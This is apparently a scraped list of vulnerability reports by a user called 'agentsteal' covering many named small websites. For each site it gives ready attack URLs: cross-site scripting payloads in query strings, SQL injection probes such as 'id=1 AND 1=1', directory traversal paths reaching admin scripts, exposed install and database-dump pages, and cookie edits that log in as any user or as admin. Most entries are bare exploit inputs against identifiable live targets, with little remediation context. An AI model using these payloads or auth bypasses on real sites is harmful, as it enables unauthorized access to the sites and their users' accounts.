agentsteal

Cross Site Scripting: There is Cross Site Scripting if you send a message that contains code. Cross Site Scripting: There is Cross Site Scripting if your username contains code.

Admin Access: You can access the admin panel by changing the username cookie to admin. Drop Down Menu: If you edit the Member Type drop down menu on http://www.gamerzworldonline.com/AuthPanel/pages/admin/index.php?action=addmember you can submit arbitrary values Insecure Cookie: You shouldn't put the username in the cookie. You can log in as any user by setting the auth cookie to their username.

Array: http://www.getyourlinkon.net/allmembers.php?search[] Array: http://www.getyourlinkon.net/member.php?user[] Array: http://www.getyourlinkon.net/viewrequest.php?title[] Cross Site Scripting: http://www.getyourlinkon.net/member.php?user=../request/agentsteal Cross Site Scripting: There is Cross Site Scripting if the auth cookie contains code. Cross Site Scripting: There is Cross Site Scripting if the Expect header contains code. Cross Site Scripting: There is Cross Site Scripting on the Links page if the fields contain 'code. Cross Site Scripting: There is Cross Site Scripting on the Request a Link page if the fields contain 'code. Cross Site Scripting: There is Cross Site Scripting when you register if the fields contain 'code. Directory Transversal: http://www.getyourlinkon.net/member.php?user=../request/agentsteal Directory Transversal: You can make txt files in any directory by registering with the username set to ../filename. Directory Transversal: You can make txt files in any directory by requesting a link with the title set to ../filename. Full Path Disclosure: http://www.getyourlinkon.net/test.php Insecure Cookie: You shouldn't put the username in the cookie. PHP Source Code Disclosure: http://www.getyourlinkon.net/ <?php echo "<html> <META HTTP-EQUIV='Refresh' CONTENT='5; URL=index.php'> </html>"; ?> You can log in as any user by setting the auth cookie to their username. You can make txt files in http://www.getyourlinkon.net/members/ by registering with the username set to the filename. You can make txt files in http://www.getyourlinkon.net/request/ by requesting a link with the title set to the filename.

Cross Site Scripting: There is Cross Site Scripting on http://www.freelancebazar.com/contact.html if you submit code in the fields. Drop Down Menu: If you edit the drop down menus on the Post Project page you can submit arbitrary values. Full Path Disclosure: http://www.freelancebazar.com/includes/classes/controlpanel.class.php Full Path Disclosure: http://www.freelancebazar.com/includes/classes/projects.class.php Full Path Disclosure: http://www.freelancebazar.com/includes/classes/register.class.php Full Path Disclosure: http://www.freelancebazar.com/includes/forms/cp_escrow_provider_showproject.form.php Full Path Disclosure: http://www.freelancebazar.com/includes/forms/cp_projects_bids.form.php Full Path Disclosure: http://www.freelancebazar.com/includes/forms/project_all_category.form.php Full Path Disclosure: http://www.freelancebazar.com/includes/forms/projects_bid.form.php Full Path Disclosure: http://www.freelancebazar.com/includes/forms/projects_clarification_board.form.php Full Path Disclosure: http://www.freelancebazar.com/includes/forms/project_category.form.php Full Path Disclosure: http://www.freelancebazar.com/includes/forms/user_comments.form.php Full Path Disclosure: http://www.freelancebazar.com/includes/html/html.php Includes Directory: http://www.freelancebazar.com/includes/ User Enumeration: http://www.freelancebazar.com/~freelan2 User Enumeration: http://www.freelancebazar.com/~root

Full Path Disclosure: There is Full Path Disclosure when you upload an image. Full Path Disclosure:

Cross Site Scripting: There is Cross Site Scripting if the Expect header contains code.

Array: http://www.games4uonline.com/mymail/create.php?subject[] Array: http://www.games4uonline.com/mymail/create.php?username[] Array: http://www.games4uonline.com/mysearch/search.php?q[] Cross Site Scripting: http://www.games4uonline.com/mymail/index.php?message='><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.games4uonline.com/mymail/create.php?subject='><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.games4uonline.com/mymail/create.php?username='><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.games4uonline.com/mysearch/search.php?q="><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.games4uonline.com/mymail/signup.php?message='><marquee><h1>vulnerable</marquee> Cross Site Scripting: There is Cross Site Scripting if the Expect header contains code. Cross Site Scripting: There is Cross Site Scripting if you submit code in a message. Full Path Disclosure: http://www.games4uonline.com/mysearch/search.php?c[] Full Path Disclosure: http://www.games4uonline.com/mysearch/search.php?i[]

Cross Site Scripting: http://www.crawfordresearch.com/arcade/search.php?term=<marquee><h1>vulnerable</marquee> Cross Site Scripting: There is Cross Site Scripting if you submit a search that contains code. Drop Down Menu: If you edit the Rate drop down menu you can submit arbitrary values. Full Path Disclosure: http://www.crawfordresearch.com/arcade/category.php Full Path Disclosure: http://www.crawfordresearch.com/arcade/search.php?term[] Null User: You can register a null username. User Enumeration: http://www.crawfordresearch.com/~crawford User Enumeration: http://www.crawfordresearch.com/~root

Cross Site Scripting: There is Cross Site Scripting if the loggedin cookie contains code. Cross Site Scripting: There is Cross Site Scripting if your username contains code. Database Dump: http://www.lamezz.com/_NEW/install/install/ Full Path Disclosure: http://www.lamezz.com/_NEW/_bin_/mailto.php Full Path Disclosure: http://www.lamezz.com/_NEW/install/install/phpinfo.php Includes Directory: http://www.lamezz.com/_NEW/_bin_/ Includes Directory: http://www.lamezz.com/_NEW/install/ SQL Error: http://www.lamezz.com/_NEW/install/forgotpass.php SQL Error: http://www.lamezz.com/_NEW/install/install/install_new.php SQL Error: http://www.lamezz.com/_NEW/install/install/upgradeV1_0-V1_2.php SQL Error: http://www.lamezz.com/_NEW/install/install/upgradeV1_0-V1_3.php SQL Error: http://www.lamezz.com/_NEW/install/install/upgradeV1_0-V1_4.php SQL Error: http://www.lamezz.com/_NEW/install/install/upgradeV1_2-V1_3.php SQL Error: http://www.lamezz.com/_NEW/install/install/upgradeV1_2-V1_4.php SQL Error: http://www.lamezz.com/_NEW/install/install/upgradeV1_3-V1_4.php SQL Error: http://www.lamezz.com/_NEW/install/login.php SQL Error: http://www.lamezz.com/_NEW/install/register.php User Enumeration: http://www.lamezz.com/~root You can log in as any user by setting the loggedin cookie to their username.

Cross Site Scripting: There is Cross Site Scripting if your username contains code.

Cross Site Scripting: There is Cross Site Scripting if you submit </textarea>code in the fields.

Admin Access: Regular users can set admin privileges and make themselves admin. Cross Site Scripting: There is Cross Site Scripting if the Expect header contains code. Cross Site Scripting: There is Cross Site Scripting if you submit code in the drop down menu on http://www.dennisbillings.com/calphalon/daysoff.php. Cross Site Scripting: There is Cross Site Scripting on http://www.dennisbillings.com/addimages.php. Cross Site Scripting: There is Cross Site Scripting on http://www.dennisbillings.com/allquotes.php. Cross Site Scripting: There is Cross Site Scripting on http://www.dennisbillings.com/blog.php. Cross Site Scripting: There is Cross Site Scripting when you register if the fields contain ">code. Drop Down Menu: If you edit the drop down menu on http://www.dennisbillings.com/calphalon/daysoff.php you can submit arbitrary values. Full Path Disclosure: http://www.dennisbillings.com/adminquoteeditor.php?id Full Path Disclosure: http://www.dennisbillings.com/music.php?pmmsid[] Full Path Disclosure: http://www.dennisbillings.com/projects.php?dl[] Full Path Disclosure: There is Full Path Disclosure in the calendar. Includes Directory: http://www.dennisbillings.com/login/ Null User: You can register a null username. SQL Injection: http://www.dennisbillings.com/adminquoteeditor.php?id=1 AND 1=1 http://www.dennisbillings.com/adminquoteeditor.php?id=1 AND 1=2 User Enumeration: http://www.dennisbillings.com/~admin User Enumeration: http://www.dennisbillings.com/~Devendea User Enumeration: http://www.dennisbillings.com/~root

Cross Site Scripting: http://www.deanschs.co.uk/controller.php?do=get&mode=embedded&id=<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.deanschs.co.uk/test.php?<marquee><h1>vulnerable</marquee> Cross Site Scripting: There is Cross Site Scripting if the Expect header contains code. Cross Site Scripting: There is Cross Site Scripting when you register if the fields contain code. Directory Transversal: http://www.deanschs.co.uk/controller.php?mode=../test.php DOS: http://www.deanschs.co.uk/module/account/login.php/ Drop Down Menu: If you edit the drop down menus in the header you can submit arbitrary values. Full Path Disclosure: http://www.deanschs.co.uk/controller.php Full Path Disclosure: http://www.deanschs.co.uk/controller.php?do[] Full Path Disclosure: http://www.deanschs.co.uk/controller.php?do=get&mode=embedded&id[] Full Path Disclosure: http://www.deanschs.co.uk/controller.php?do=get&mode=showindex&id=1&gid[] Full Path Disclosure: http://www.deanschs.co.uk/controller.php?mode=../test.php Full Path Disclosure: http://www.deanschs.co.uk/controller.php?mode[] Full Path Disclosure: SQL Error: http://www.deanschs.co.uk/controller.php?do=get&mode=embedded SQL Error: http://www.deanschs.co.uk/module/get/showindex.php SQL Error: http://www.deanschs.co.uk/module/get/showindexsub.php SQL Error: http://www.deanschs.co.uk/module/get/showpage.php SQL Injection: http://www.deanschs.co.uk/controller.php?do=get&mode=showindex&id=1 AND 1=1 http://www.deanschs.co.uk/controller.php?do=get&mode=showindex&id=1 AND 1=2 SQL Injection: http://www.deanschs.co.uk/controller.php?do=get&mode=showindex&id=3&gid=1 AND 1=1 http://www.deanschs.co.uk/controller.php?do=get&mode=showindex&id=3&gid=1 AND 1=2

Array: http://www.freethepenguins.com/a[] Array: http://www.freethepenguins.com/t=1&c[] Drop Down Menu: If you edit the drop down menus on http://www.freethepenguins.com/fsearch=a you can submit arbitrary values. Full Path Disclosure:

Array: http://multisearch.110mb.com/Grabs/grab.php?Video[] Cross Site Scripting: http://multisearch.110mb.com/Admin/index.php/"><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://multisearch.110mb.com/Grabs/grab.php?Video="onmouseover=alert('vulnerable') Cross Site Scripting: There is Cross Site Scripting if the Expect header contains code. Cross Site Scripting: There is Cross Site Scripting if you submit code in the Engine drop down menu. Drop Down Menu: If you edit the Engine drop down menu you can submit arbitrary values.

Full Path Disclosure: There is Full Path Disclosure if the PHPSESSID cookie is set to an invalid value. http://www.rawstar7.co.uk/site/comp/linux/security/tut_ssh.html Includes Directory: http://www.rawstar7.co.uk/monkey/mods/ Includes Directory: http://www.rawstar7.co.uk/monkey/res/ User Enumeration: http://www.rawstar7.co.uk/~rawstar7/

Array: http://www.cmxva.com/index.php?page=flights&p[] Array: http://www.cmxva.com/index.php?page[] Array: http://www.cmxva.com/index.php?page=profile&call[] Cross Site Scripting: http://www.cmxva.com/index.php?page=<marquee>vulnerable</marquee> Cross Site Scripting: http://www.cmxva.com/index.php?page=flights&p="><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.cmxva.com/index.php?page=profile&call=<marquee><h1>vulnerable</marquee> Directory Transversal: http://www.cmxva.com/?page=../index Full Path Disclosure: http://www.cmxva.com/?page=../../ Full Path Disclosure: http://www.cmxva.com/?page=../forums/index Full Path Disclosure: http://www.cmxva.com/index.php?page=flights&s[] Full Path Disclosure: http://www.cmxva.com/?page=FsPgetflight Full Path Disclosure: http://www.cmxva.com/pages/account.php Full Path Disclosure: http://www.cmxva.com/pages/aircraft.php Full Path Disclosure: http://www.cmxva.com/pages/fleet.php Full Path Disclosure: http://www.cmxva.com/pages/FsPgetflight.php Full Path Disclosure: http://www.cmxva.com/pages/lost.php Full Path Disclosure: http://www.cmxva.com/pages/loa.php Full Path Disclosure: http://www.cmxva.com/pages/members.php Full Path Disclosure: http://www.cmxva.com/pages/postflight.php Full Path Disclosure: http://www.cmxva.com/pages/remove.php Full Path Disclosure: http://www.cmxva.com/pages/training.php Includes Directory: http://www.cmxva.com/pages/ Maximum Length: If you edit the input boxes when you register you can remove the maximum lengths. SQL Error: http://www.cmxva.com/index.php?page=profile&call='

Cross Site Scripting: There is Cross Site Scripting if the Expect header contains code. Cross Site Scripting: There is Cross Site Scripting when you register if the fields contain ">code. Full Path Disclosure: There is Full Path Disclosure if the PHPSESSID cookie is set to an invalid value. Null User: You can register a null password. Null User: You can register a null username.

Cross Site Scripting: https://lockbin.com/test.php?m=<marquee><h1>vulnerable</marquee> Full Path Disclosure: https://lockbin.com/test.php?m[]

Array: http://www.sparkcash.net/inside/tracker.php?c[] Array: http://www.sparkcash.net/inside/tracker.php?url[] Array: http://www.sparkcash.net/signup.php?r[] Cross Site Scripting: http://www.sparkcash.net/signup.php?r="><td><marquee><h1>vulnerable</marquee> Cross Site Scripting: There is Cross Site Scripting when you register if the fields contain code. Drop Down Menu: If you edit the drop down menu on http://www.sparkcash.net/inside/offers.php you can submit arbitrary values. Insecure Cookie: You shouldn't put the password in the cookie. Insecure Cookie: You shouldn't put the username in the cookie. URL Inclusion: http://www.sparkcash.net/inside/tracker.php?url=http://www.google.com/

Cross Site Scripting: http://meisnermusic.awardspace.com/?a=n&s="><marquee><h1>vulnerable</marquee>

SQL Error: http://obb.awardspace.com/index.php?page=viewforum&row='

Cross Site Scripting: There is Cross Site Scripting if the Website contains "code. Full Path Disclosure: There is Full Path Disclosure on multiple pages in http://www.ocwars.com/v2/application/rapyd/. Drop Down Menu: If you edit the Country Code drop down menu you can submit arbitrary values. Includes Directory: http://www.ocwars.com/v2/application/rapyd/

Cross Site Scripting: http://www.zidub.com/cgi-sys/scgiwrap/<marquee><h1>vulnerable</marquee> Cross Site Scripting: There is Cross Site Scripting if you submit a search that contains code. Cross Site Scripting: There is Cross Site Scripting if you submit code in the drop down menu on the articles page. Cross Site Scripting: There is Cross Site Scripting when you register if the fields contain code. Drop Down Menu: If you edit the drop down menu on the articles page you can submit arbitrary values. Full Path Disclosure: http://www.zidub.com/cgi-sys/scgiwrap/ User Enumeration: http://www.zidub.com/~root User Enumeration: http://www.zidub.com/~zfred09

Admin Access: You can view and edit the site's source code through the Directory Transversal in the notes script. Array: http://speaker219.ath.cx:8080/blog/index.php?waka[] Array: http://speaker219.ath.cx:8080/blog/test.node?text[] Array: http://speaker219.ath.cx:8080/Chat/history.php?log[] Cross Site Scripting: http://speaker219.ath.cx:8080/blog/index.php?waka=<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://speaker219.ath.cx:8080/blog/test.node?text=<marquee><h1>vulnerable</marquee> Cross Site Scripting: There is Cross Site Scripting if you submit a note that contains </textarea>code. Cross Site Scripting: There is Cross Site Scripting on http://speaker219.ath.cx:8080/URL-Encoder/test.php if the URL field contains code. Directory Transversal: http://speaker219.ath.cx:8080/Chat/history.php?log=1/../../../vulnerable Directory Transversal: http://speaker219.ath.cx:8080/notes/paste-edit.php?post=../Chat/admincp.php Full Path Disclosure: http://speaker219.ath.cx:8080/Chat/preferences.php Full Path Disclosure: http://speaker219.ath.cx:8080/forum/ajax.php Full Path Disclosure: http://speaker219.ath.cx:8080/forum/announcement.php Full Path Disclosure: http://speaker219.ath.cx:8080/forum/calendar.php Full Path Disclosure: http://speaker219.ath.cx:8080/forum/cron.php Full Path Disclosure: http://speaker219.ath.cx:8080/forum/editpost.php Full Path Disclosure: http://speaker219.ath.cx:8080/forum/external.php Full Path Disclosure: http://speaker219.ath.cx:8080/forum/faq.php Full Path Disclosure: http://speaker219.ath.cx:8080/forum/forumdisplay.php Full Path Disclosure: http://speaker219.ath.cx:8080/Pics/lolcats/?id[] Full Path Disclosure: http://speaker219.ath.cx:8080/scripts/test.php?txt[] Full Path Disclosure: http://speaker219.ath.cx:8080/RSS-Reader.php?q=a Full Path Disclosure: http://speaker219.ath.cx:8080/Chat/history.php?log=2' Full Path Disclosure: http://speaker219.ath.cx:8080/Chat/cp/bans.php Full Path Disclosure: http://speaker219.ath.cx:8080/notes/paste-edit.php PHP Source Code Disclosure: http://speaker219.ath.cx:8080/notes/paste-edit.php?post=../Chat/admincp.php